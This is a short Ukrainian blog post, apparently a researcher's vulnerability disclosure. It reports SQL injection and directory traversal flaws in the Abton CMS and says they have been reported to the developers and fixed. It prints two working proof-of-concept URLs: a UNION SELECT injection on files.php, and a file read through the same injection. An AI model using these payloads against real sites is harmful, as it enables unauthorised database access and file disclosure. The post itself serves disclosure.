Нові уразливості в Abton
19:17 19.02.201023.10.2009
У лютому, 17.02.2009, я знайшов SQL Injection та Directory Traversal уразливості в системі Abton. Це українська CMS. Дірку виявив на http://uareferat.com, де використовується даний движок.
Раніше я вже писав про уразливості в Abton.
Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.
19.02.2010
SQL Injection:
http://site/files.php?refdll=-1+union+select+version()%23
Про дану SQL Injection мені повідомив Alex в коментарях під час обговорення попередніх дірок на uareferat.com. Також я виявив, що через цю уразливість можна проводити Directory Traversal атаки.
Directory Traversal (через SQL Injection):
http://site/files.php?refdll=-1+union+select+’../file.php’%23
Дані уразливості вже виправлені (в движку і на сайті uareferat.com).